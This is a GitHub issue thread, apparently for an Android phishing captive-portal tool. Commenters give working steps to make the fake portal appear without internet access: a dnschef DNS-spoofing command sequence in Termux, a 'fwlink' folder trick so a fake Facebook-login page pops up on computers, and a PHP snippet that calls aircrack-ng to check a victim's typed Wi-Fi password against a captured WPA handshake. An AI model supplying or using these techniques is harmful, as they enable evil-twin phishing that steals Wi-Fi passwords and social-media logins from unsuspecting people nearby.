### ISSUE TITLE
without internet access

### ISSUE THREAD

**Issue by boo6ster** [kleo/android-portals#1]
you can use the dns server in termux to redirect all dns queries to the ip address of the captive portal interface, for example using dnschef, works fine without internet access wifi/bt/mobile data, hotspot launches "Tap here to log on to network" without internet connection

**Comment by kleo** [comment]
i'll try it out. thanks!

**Comment by Robin6464** [comment]
additionally, you can add validation of the given wifi password with the previously captured 4-way handshake in the php file:

    $ret = shell_exec("sudo aircrack-ng -q -e network_name -w panen.txt file.cap");
    $pos = strpos($ret, "KEY FOUND");
    if ($pos !== false) {
    // znalezione
    header("Location:  success.html");
    exit;
    } else {
    // nieznalezione
    header("Location: error.html");
    exit;
    }

**Comment by Miku-33** [comment]
> you can use the dns server in termux to redirect all dns queries to the ip address of the captive portal interface, for example using dnschef, works fine without internet access wifi/bt/mobile data, hotspot launches "Tap here to log on to network" without internet connection

Hi Robin6464, can you explain me how did you achieve to do that ? Thanks a lot !

**Comment by boo6ster** [comment]
1. Install python3 and dnschef from github in termux
2. Start the captive portal as stated in the instructions without mobile data/hotspot/no internet connection - no turn on hotspot yet
3. In the new termux console window: sudo python3 dnschef.py -i 0.0.0.0 -fakeip 0.0.0.0 -q
4. Turn on open hotspot without password/no security
5. Terminate dnschef: ctrl+c in window dnschef
6. In the new termux console window check ip address of wlan0 interface: sudo ifconfig
7. In the window with dnschef: sudo python3 dnschef.py -i ipwlan0 --fakeip ipwlan0 -q
example if your ip address of wlan0 interface is 192.168.30.50: sudo python3 dnschef.py -i 192.168.30.50 --fakeip 192.168.30.50 -q

**Comment by Miku-33** [comment]
Thanks, I'll give a try !

**Comment by boo6ster** [comment]
it helped?

**Comment by Miku-33** [comment]
> it helped?

Yes but unfortunately it works only with android phones, no way to make the captive portal pop-up on a computer !

**Comment by boo6ster** [comment]
You need to create a fwlink folder for computers, for example in the facebook-login folder create a fwlink folder and copy all files/folders of the facebook-login folder to fwlink folder without fwlink folder :)

**Comment by boo6ster** [comment]
Already works for computers?

**Comment by Miku-33** [comment]
I can't use this method because I'm using an app to host the web pages (there are css/html), I don't use the php server. Anyway, I gave up this solution and used ESP8266 instead ! ;)

Thanks for the help !
